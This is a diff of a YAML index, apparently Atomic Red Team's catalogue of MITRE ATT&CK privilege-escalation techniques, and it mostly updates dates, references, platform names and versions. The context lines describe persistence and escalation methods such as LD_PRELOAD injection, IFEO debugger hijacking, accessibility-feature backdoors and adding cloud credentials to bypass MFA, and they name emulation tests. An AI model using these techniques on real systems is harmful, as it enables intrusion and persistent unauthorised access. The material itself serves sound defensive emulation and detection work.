@@ -38153,8 +38481,6 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests:
     - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -38198,7 +38524,7 @@ privilege-escalation:
         elevation_required: true
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -38275,7 +38601,6 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests:
     - name: Launch Daemon
@@ -38361,7 +38686,7 @@ privilege-escalation:
           sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -38380,6 +38705,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -38387,7 +38713,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -38407,29 +38732,31 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests:
     - name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -38450,7 +38777,7 @@ privilege-escalation:
         name: powershell
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -38486,6 +38813,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -38497,16 +38828,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -38542,12 +38869,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -38555,9 +38882,8 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests:
     - name: LockBit Black - Modify Group policy settings -cmd
@@ -38613,7 +38939,7 @@ privilege-escalation:
         elevation_required: true
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -38628,6 +38954,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -38636,18 +38963,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -38679,9 +39006,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -38831,7 +39155,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests:
     - name: Create a new time provider
@@ -38910,7 +39233,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -38936,8 +39259,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests:
     - name: Trap EXIT
@@ -39028,7 +39349,7 @@ privilege-escalation:
         name: sh
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -39149,7 +39470,6 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Shared Library Injection via /etc/ld.so.preload
@@ -39270,7 +39590,7 @@ privilege-escalation:
         elevation_required: false
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -39302,11 +39622,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -39347,11 +39666,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -39407,7 +39725,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests:
     - name: Access Token Manipulation
@@ -39441,7 +39758,7 @@ privilege-escalation:
         name: powershell
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -39498,7 +39815,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests:
     - name: Make and modify binary from C source
@@ -39783,7 +40099,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests:
     - name: Winlogon Shell Key Persistence - PowerShell
@@ -40016,7 +40331,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests:
     - name: Modify SSH Authorized Keys
@@ -40089,7 +40403,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -40122,8 +40436,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests:
     - name: IFEO Add Debugger
@@ -40224,7 +40536,7 @@ privilege-escalation:
         elevation_required: true
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -40286,10 +40598,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -40347,7 +40658,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -40389,7 +40699,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -40448,8 +40758,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -40479,7 +40787,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -40514,12 +40822,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -40596,7 +40902,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests:
     - name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -40768,7 +41073,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -40817,8 +41122,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests:
     - name: Process Injection via C#
@@ -40937,7 +41240,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -40985,8 +41288,6 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests:
     - name: Create registry persistence via AppCert DLL
@@ -41031,7 +41332,7 @@ privilege-escalation:
         elevation_required: true
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -41044,16 +41345,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -41065,16 +41366,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -41129,7 +41430,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -41152,7 +41452,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -41196,8 +41496,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests:
     - name: Portable Executable Injection
@@ -41308,7 +41606,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -41336,8 +41634,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests:
     - name: Persistence by modifying Windows Terminal profile
@@ -41469,7 +41765,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests:
     - name: Named pipe client impersonation
@@ -41613,18 +41908,18 @@ privilege-escalation:
         elevation_required: true
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -41634,11 +41929,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -41649,12 +41948,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -41663,6 +41969,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -41671,13 +41978,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
